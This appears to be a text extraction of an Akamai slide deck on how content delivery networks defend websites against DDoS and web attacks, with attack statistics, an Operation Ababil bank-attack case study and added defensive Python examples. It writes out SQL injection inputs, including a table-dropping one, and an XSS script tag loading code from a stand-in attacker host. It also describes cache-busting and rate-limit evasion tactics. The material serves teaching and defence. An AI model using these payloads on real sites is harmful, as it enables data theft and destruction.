The Role of Content Delivery Networks in Protecting Web Sites from Attacks

Bruce Maggs
VP for Research, Akamai Technologies
Distributed Denial of Service (DDoS) Attacks
The attacker hopes to overwhelm the content provider’s resources with requests for service.
Sometimes the attacker employs a “bot army” of compromised machines.
The attacker tries to issue requests for content that cannot be cached.
The attacker looks for “amplification”, where an easy-to-generate request requires a difficult-to-generate response.
©2013 AKAMAI | FASTER FORWARDTM
Attack Frequency (Attacks Detected and Mitigated)
[Chart: attacks detected and mitigated per year, 2010 through 2014; bar values shown: 991, 1317, 2002, 2936, 5634]
Largest Attacks by Year
[Chart: largest attack each year, 2005 through 2014, measured in Gbps and Mpps; values labelled for 2014: 320 and 270, for 2013: 190 and 144, for 2005: 11 and 2; the labels for 2006 through 2012 range from 8 to 82]
Attack Types Q3 2014
[Chart: breakdown of attack types, Q3 2014; no values survived extraction]
Attack Origins Q3 2014
US          23.95%
China       20.07%
Brazil      17.60%
Mexico      14.16%
Korea        6.13%
Germany      5.78%
Japan        4.10%
Russia       2.97%
India        2.81%
Thailand     2.43%
Targeted Industry Sectors
Gaming                         33.67%
Media & Entertainment          23.65%
Software & Technology          19.44%
Financial Services              9.22%
Internet & Telecom              8.82%
Education                       2.20%
Public Sector                   1.40%
Health Care & Life Sciences and Hotel & Travel: 1.20% and 0.20% (the extracted chart does not show which sector carries which value)
Business Services               0.20%
Avoid data theft and downtime by extending the security perimeter outside the data center and protect against the increasing frequency, scale and sophistication of web attacks.
The Akamai Platform Provides a Perimeter Defense
[Diagram: End User → Akamai → Origin Server, with two log-scale traffic charts (1 to 10000) contrasting Akamai Traffic with Origin Traffic]
Defeating HTTP flooding attacks – Rate Controls
1. Count the number of Forward Requests
2. Block any IP address with excessive forward requests
[Diagram: Client Request → Akamai Edge Server → Forward Request → Customer Origin → Forward Response; a blocked client (X) receives a Custom Error page instead of a forward request]
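The two-step rule above, worked through as an added example (this is not Akamai's rate-control code). It counts each client's forward requests, that is, edge cache misses that would be passed to the origin, in a sliding window, and blocks the client, which would then receive the error page, once the count is excessive. The log records, IP addresses and thresholds are constructed for the example.

```python
"""Per-client rate control on forward requests: an added example, not Akamai's
implementation. It follows the two steps on the slide: count each client's
forward requests (edge cache misses passed to the origin) in a sliding window,
and block the client, serving it an error page, once the count is excessive.
The log records, IP addresses and thresholds below are constructed."""
from collections import defaultdict, deque

# Constructed edge-server log entries: (timestamp in seconds, client IP, cache status).
# A client at 203.0.113.7 fires eight uncacheable requests in four seconds;
# a normal client at 198.51.100.2 mixes cache hits with a couple of misses.
SAMPLE_LOG = [(i * 0.5, "203.0.113.7", "MISS") for i in range(8)] + [
    (0.2, "198.51.100.2", "HIT"),
    (1.1, "198.51.100.2", "MISS"),
    (2.3, "198.51.100.2", "HIT"),
    (3.4, "198.51.100.2", "MISS"),
    (4.0, "198.51.100.2", "HIT"),
]


class ForwardRequestRateControl:
    """Sliding-window counter of forward requests per client IP."""

    def __init__(self, max_forwards, window_seconds, block_seconds):
        self.max_forwards = max_forwards      # forwards allowed inside one window
        self.window_seconds = window_seconds  # width of the sliding window
        self.block_seconds = block_seconds    # how long an offender stays blocked
        self.windows = defaultdict(deque)     # ip -> timestamps of recent forwards
        self.blocked_until = {}               # ip -> time at which the block expires

    def handle(self, now, ip, cache_status):
        """Decide one request: 'blocked', 'served-from-cache' or 'forwarded'."""
        until = self.blocked_until.get(ip)
        if until is not None and now < until:
            return "blocked"                  # custom error page, no forward request
        if cache_status == "HIT":
            return "served-from-cache"        # hits never reach the origin, so they are not counted
        recent = self.windows[ip]
        recent.append(now)
        while recent and recent[0] <= now - self.window_seconds:
            recent.popleft()                  # drop forwards that fell out of the window
        if len(recent) > self.max_forwards:
            self.blocked_until[ip] = now + self.block_seconds
            recent.clear()
            return "blocked"
        return "forwarded"


def replay(log, max_forwards=5, window_seconds=10.0, block_seconds=60.0):
    """Replay a log in time order and count the decisions taken per client IP."""
    control = ForwardRequestRateControl(max_forwards, window_seconds, block_seconds)
    decisions = defaultdict(lambda: defaultdict(int))
    for timestamp, ip, status in sorted(log):
        decisions[ip][control.handle(timestamp, ip, status)] += 1
    return {ip: dict(counts) for ip, counts in decisions.items()}


if __name__ == "__main__":
    for ip, counts in replay(SAMPLE_LOG).items():
        print(ip, counts)
```

Only misses are counted, because a request served from the edge cache costs the origin nothing. The block duration is deliberately longer than the window: a client that stops after a short burst and comes back a little later is still blocked, which is what makes the control hold up against bursty traffic rather than only sustained floods.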
Filtering Out Malformed Requests
• SQL injection attacks
• Cross-site scripting (XSS) attacks
• Cache busting attacks
Relational databases
Relational databases store tables consisting of rows and columns.
(image from http://support.sas.com)
Structured Query Language (SQL)
Example Query:
SELECT * FROM Employees WHERE LName = 'PARKER';
Result row:
IdNum  LName   FName  JobCode  Salary  Phone
1354   PARKER  MARY   FA3      65800   914/455-2337
Example SQL Injection
Suppose a program creates the following SQL query, where userName is a variable holding input provided by an end-user, e.g., through a form on a Web page.
"SELECT * FROM Employees WHERE LName = '" + userName + "';"
But instead of entering a name like PARKER the user enters
' or '1'='1
Then the query becomes
SELECT * FROM Employees WHERE LName = '' or '1'='1';
This query returns all rows in the Employees table!
A More Destructive Injection
Same code as before:
"SELECT * FROM Employees WHERE LName = '" + userName + "';"
But now suppose the user enters
a'; DROP TABLE Employees
Then the query becomes
SELECT * FROM Employees WHERE LName = 'a'; DROP TABLE Employees;
This query might delete the Employees table! (Not all databases allow two queries in the same string.)
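The string-built query from the two slides above, placed beside its parameterized form, as an added example that is not code from the slides. It runs against an in-memory SQLite table with the slide's column names; the PARKER row is the slide's, the other two rows are constructed. Both lookups receive the same inputs, including the two inputs the slides show, so the difference in outcome is entirely down to how the input reaches the database.

```python
"""The slide's string-built query beside a parameterized version: an added
example, not code from the slides. It runs against an in-memory SQLite table
named as on the slide; the PARKER row is the slide's, the other rows are
constructed."""
import sqlite3


def make_db():
    """Create the Employees table with the slide's columns and a few rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Employees (IdNum INTEGER, LName TEXT, FName TEXT,"
        " JobCode TEXT, Salary INTEGER, Phone TEXT)"
    )
    conn.executemany(
        "INSERT INTO Employees VALUES (?, ?, ?, ?, ?, ?)",
        [
            (1354, "PARKER", "MARY", "FA3", 65800, "914/455-2337"),  # row from the slide
            (1001, "SMITH", "JOHN", "PT2", 52000, "914/555-0100"),   # constructed
            (1002, "JONES", "ANN", "FA1", 48500, "914/555-0199"),    # constructed
        ],
    )
    return conn


def lookup_vulnerable(conn, user_name):
    """The slide's pattern: user input concatenated into the SQL text."""
    query = "SELECT * FROM Employees WHERE LName = '" + user_name + "';"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, user_name):
    """Hardened form: the input is bound as a value and can never change the SQL."""
    return conn.execute(
        "SELECT * FROM Employees WHERE LName = ?;", (user_name,)
    ).fetchall()


def compare():
    """Run both lookups on a normal name and on the two inputs from the slides."""
    conn = make_db()
    results = {}
    results["normal"] = (len(lookup_vulnerable(conn, "PARKER")),
                         len(lookup_parameterized(conn, "PARKER")))
    tautology = "' or '1'='1"
    results["tautology"] = (len(lookup_vulnerable(conn, tautology)),
                            len(lookup_parameterized(conn, tautology)))
    stacked = "a'; DROP TABLE Employees"
    try:
        lookup_vulnerable(conn, stacked)
        vulnerable_outcome = "executed"
    except (sqlite3.Warning, sqlite3.ProgrammingError) as exc:
        # SQLite's Python binding refuses two statements in one execute() call,
        # which is the "not all databases allow two queries" caveat on the slide.
        vulnerable_outcome = "rejected: " + str(exc)
    results["stacked"] = (vulnerable_outcome, len(lookup_parameterized(conn, stacked)))
    results["rows_left"] = conn.execute("SELECT COUNT(*) FROM Employees").fetchone()[0]
    return results


if __name__ == "__main__":
    for case, outcome in compare().items():
        print(case, outcome)
```

With the tautology input the concatenated query returns every row while the parameterized query returns none, because the bound value is compared literally against LName. The stacked input is refused by this particular driver, exactly the caveat the slide makes; the parameterized query does not rely on that luck, since the input is never parsed as SQL at all.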
bobby-tables.com: A guide to preventing SQL injection
(from the comic strip xkcd)
Cross-Site Scripting
Attacker types this into text entry form:
<script src=http://theftsRus.com/script.js></script>
Attacker hopes that later the site will insert this into the HTML that it outputs, and then the victim’s browser will execute the script.
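The scenario on this slide, carried through as an added example (not code from the slides): text submitted through a form is later placed into a page. The unsafe renderer copies it verbatim; the safe one HTML-escapes it on output, so the browser displays the text instead of loading the script. The page template is constructed; the submitted text is the slide's.

```python
"""Output escaping for the scenario on the slide: an added example, not code
from the slides. The page template is constructed; SUBMITTED is the slide's."""
import html
from html.parser import HTMLParser

PAGE_TEMPLATE = "<html><body><p>Latest comment: {comment}</p></body></html>"

# Exactly what the slide shows the attacker typing into the text entry form.
SUBMITTED = "<script src=http://theftsRus.com/script.js></script>"


def render_unsafe(comment):
    """Interpolates the stored text straight into the HTML (the vulnerable pattern)."""
    return PAGE_TEMPLATE.format(comment=comment)


def render_safe(comment):
    """Escapes <, >, &, and quotes so the text is displayed, not interpreted."""
    return PAGE_TEMPLATE.format(comment=html.escape(comment, quote=True))


class ScriptTagCounter(HTMLParser):
    """Counts <script> start tags the way a browser's tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1


def count_script_tags(page):
    """How many script elements a tokenizer finds in the rendered page."""
    parser = ScriptTagCounter()
    parser.feed(page)
    parser.close()
    return parser.script_tags


if __name__ == "__main__":
    print("unsafe:", count_script_tags(render_unsafe(SUBMITTED)), "script tag(s)")
    print("safe:  ", count_script_tags(render_safe(SUBMITTED)), "script tag(s)")
    print(render_safe(SUBMITTED))
```

html.escape is the right tool only for text placed in element content or a quoted attribute; text that lands inside a script block, a URL or a style rule needs the encoding of that context, which is why the escaping is done at the point of output rather than when the form is received.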
Cache Busting
Attacker adds query strings to the end of a requested URL, e.g.,
http://ak.xyz.com/logo.gif?id=832164328
Attacker hopes that the CDN will view each request with a different query string as a request for a different object, and fetch a new copy from the content provider.
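One way an edge cache defeats the tactic above, as an added example rather than Akamai's implementation: derive the cache key from host and path plus only those query parameters the content provider has declared meaningful for that path. Every ?id=<random> variant of a static object then maps to a single cached copy and a single origin fetch. The policy, the search URLs and the request streams are constructed; the logo URL is the slide's.

```python
"""Cache-key normalization against query-string cache busting: an added
example, not Akamai's implementation. The policy and request streams are
constructed; the logo URL is the one on the slide."""
from urllib.parse import parse_qsl, urlencode, urlsplit

# Constructed policy: query parameters that select distinct content per path.
# Static assets take none, so any query string on them is ignored for the key.
CACHE_KEY_POLICY = {
    "/logo.gif": (),
    "/search": ("q", "page"),
}


def naive_key(url):
    """The behaviour the attacker hopes for: every distinct URL is a distinct object."""
    return url


def normalized_key(url):
    """Host + path + only the allowed parameters, sorted so order does not matter."""
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    allowed = CACHE_KEY_POLICY.get(parts.path)
    # Paths without a policy keep their full query: less cacheable, but never
    # at risk of serving one user's object for another's request.
    if allowed is not None:
        params = [(k, v) for k, v in params if k in allowed]
    params.sort()
    key = parts.netloc.lower() + parts.path
    return key + ("?" + urlencode(params) if params else "")


class EdgeCache:
    """Minimal edge cache that counts how often it had to go to the origin."""

    def __init__(self, key_fn):
        self.key_fn = key_fn
        self.store = {}
        self.origin_fetches = 0

    def get(self, url):
        key = self.key_fn(url)
        if key not in self.store:
            self.origin_fetches += 1
            self.store[key] = "<response body for %s>" % key  # stand-in for the forward response
        return self.store[key]


def origin_fetches(urls, key_fn=normalized_key):
    """Serve each URL in turn and report how many forward requests were needed."""
    cache = EdgeCache(key_fn)
    for url in urls:
        cache.get(url)
    return cache.origin_fetches


# Constructed request streams.
BUSTING_REQUESTS = [
    "http://ak.xyz.com/logo.gif?id=832164328",   # the slide's example URL
    "http://ak.xyz.com/logo.gif?id=17",
    "http://ak.xyz.com/logo.gif?id=99999",
    "http://ak.xyz.com/logo.gif",
]
SEARCH_REQUESTS = [
    "http://ak.xyz.com/search?q=parker&page=1",
    "http://ak.xyz.com/search?page=1&q=parker&utm=abc",  # same content as the first
    "http://ak.xyz.com/search?q=jones",                  # genuinely different
]

if __name__ == "__main__":
    print("naive key, busting stream:     ", origin_fetches(BUSTING_REQUESTS, naive_key))
    print("normalized key, busting stream:", origin_fetches(BUSTING_REQUESTS))
    print("normalized key, search stream: ", origin_fetches(SEARCH_REQUESTS))
```

The allowlist is per path on purpose: dropping all query strings globally would make the search page serve stale or wrong results, while keeping them all is what the attacker is counting on. The sort step matters too, since q=a&page=1 and page=1&q=a are the same request and should not cost two fetches.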
Operation Ababil
“none of the U.S banks will be safe from our attacks”
Phase 1: Sep 12 – Early Nov 2012
• DNS packets with “AAAAA” payload
• Limited Layer 7 attacks
• Early-mid Oct 2012 announced names of banks where attacks succeeded (did not announce bank names if attacks were unsuccessful)
• Began use of HTTP dynamic content to circumvent static caching defenses
Phase 2: Dec 12, 2012 – Jan 29
• Incorporate random query strings and values
• Addition of random query strings against PDFs
• Additions to bot army
• Burst probes to bypass rate-limiting controls
• Addition of valid argument names, random values
Phase 3: Late Feb 2013 – May 2013
• Multiple probes
• Multiple targets
• Increased focus on Layer 7 attacks
• Target banks where attacks work
• Fraudsters take advantage
Phase 4: July 2013 –
• Used fake plug-ins to infect files
Phase 1 Attack – Sept 2012
[Chart: DNS Traffic Handled by Akamai, series “Total eDNS”, 0.0 M to 1.8 M over Tues 12:00 – Wed 12:00]
Attack Traffic: 23 Gbps (10,000X normal)
Duration: 4.5 Hours
High volume of non-standard packets sent to UDP port 53
Packets did not include a valid DNS header
Packets consisted of large blocks of repeating “A”s
The packets were abnormally large
Simultaneously, a SYN-Flood was directed against TCP port 53
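The three observations on this slide (no valid DNS header, large blocks of repeating “A”s, abnormally large packets) translate directly into checks a port 53 filter can apply to each UDP payload. The following is an added example, not Akamai's filtering code: the header layout is RFC 1035's, while the size threshold, the filler ratio and the sample packets are constructed. The SYN flood on TCP 53 is a transport-level matter and is not covered here.

```python
"""Sanity checks on UDP port 53 payloads, reflecting the Phase 1 observations
on the slide: an added example, not Akamai's filtering code. Thresholds and
sample packets are constructed; the header layout is RFC 1035's."""
import struct
from collections import Counter


def build_dns_query(name, txid=0x1234):
    """Build a minimal standard A query, used here as the 'normal' sample."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)  # RD set, one question
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split("."))
    return header + qname + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN


def inspect_dns_payload(payload, max_normal_len=512):
    """Return ["ok"] or a list of reasons the payload does not look like a DNS query."""
    findings = []
    if len(payload) < 12:
        return ["truncated: shorter than the 12-byte DNS header"]
    _txid, flags, qdcount, ancount, nscount, arcount = struct.unpack("!HHHHHH", payload[:12])
    qr = flags >> 15                 # 0 for a query
    opcode = (flags >> 11) & 0xF     # 0 query, 1 inverse query, 2 status
    z_bit = (flags >> 6) & 1         # reserved, must be zero
    if qr != 0 or opcode > 2 or z_bit != 0:
        findings.append("invalid header: QR/opcode/Z bits are not those of a query")
    if qdcount != 1 or ancount != 0 or nscount != 0 or arcount > 1:
        findings.append("invalid header: implausible section counts for a query")
    if len(payload) > max_normal_len:
        findings.append("oversized: %d bytes" % len(payload))
    top_byte, top_count = Counter(payload).most_common(1)[0]
    share = top_count / len(payload)
    if share > 0.9:
        findings.append("filler: %d%% of the payload is byte 0x%02x" % (round(share * 100), top_byte))
    return findings or ["ok"]


# Constructed sample: three ordinary queries, five of the repeating-"A" packets
# described on the slide, and one runt packet.
SAMPLE_PACKETS = (
    [build_dns_query("www.example.com")] * 3
    + [b"A" * 1400] * 5
    + [b"AAAA"]
)


def summarize(packets):
    """Count packets that pass versus packets with at least one finding."""
    tally = Counter()
    for packet in packets:
        tally["ok" if inspect_dns_payload(packet) == ["ok"] else "suspicious"] += 1
    return dict(tally)


if __name__ == "__main__":
    for finding in inspect_dns_payload(b"A" * 1400):
        print(finding)
    print(summarize(SAMPLE_PACKETS))
```

A packet made of repeated 0x41 bytes fails every check at once: its flags decode to a reserved opcode with the Z bit set, its section counts are absurd, and one byte value accounts for the entire payload. ARCOUNT of one is tolerated because ordinary resolvers add an EDNS OPT record; a filter that rejected it would drop legitimate traffic.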
Phase 2 Attacks - January 2nd, 2013
Banks on Akamai (Bank #1 – Bank #5):
• QCF targeted PDF files: Akamai Dynamic Caching Rules offloaded 100% of the traffic. No Origin Impact.
• QCF targeted marketing web pages: Rate controls automatically activated. Attack was deflected, far from bank’s datacenter. No Origin Impact.
• QCF targeted SSL: Akamai offloaded 99% of the traffic. No Origin Impact.
Banks NOT on Akamai (Bank #1 – Bank #5), Gomez agents in 12 cities measuring hourly:
[Two charts of agent measurements; labels on the charts: Error/Outage—site not responding; times shown: 9:00 AM, 12:03 PM, 12:44 PM, 6:21 PM]
Phase 3 Attack Example
• Attack started on the morning of March 5, 2013
• Peak Attack Traffic > 126 thousand requests per second
• 70x normal Edge Bandwidth (29 Gbps)
• Origin Traffic stayed at normal levels
• ~2000 Agents participated in the 20 minute assault
• 80% of the agents were new IP addresses that had not participated in earlier campaigns
Attack Tactics - Pre-attack Reconnaissance
Attackers test the site with short burst high speed probes
• Short bursts of attack requests on non-cacheable content every 10 minutes
• Peak of 18 million requests per second
If the site falters, they announce that they will attack that bank and return later with a full scale attack
If the site is resilient they move on
Observations
Due to recent attack sizes, infrastructure capacity build out is not economical, and may not work anyway
• Attacks range from 13X to 70X normal traffic, 25X to 120X normal request volume
The burst speed of attacks has become too fast for reactive mitigation – a proactive “always-on” defense is necessary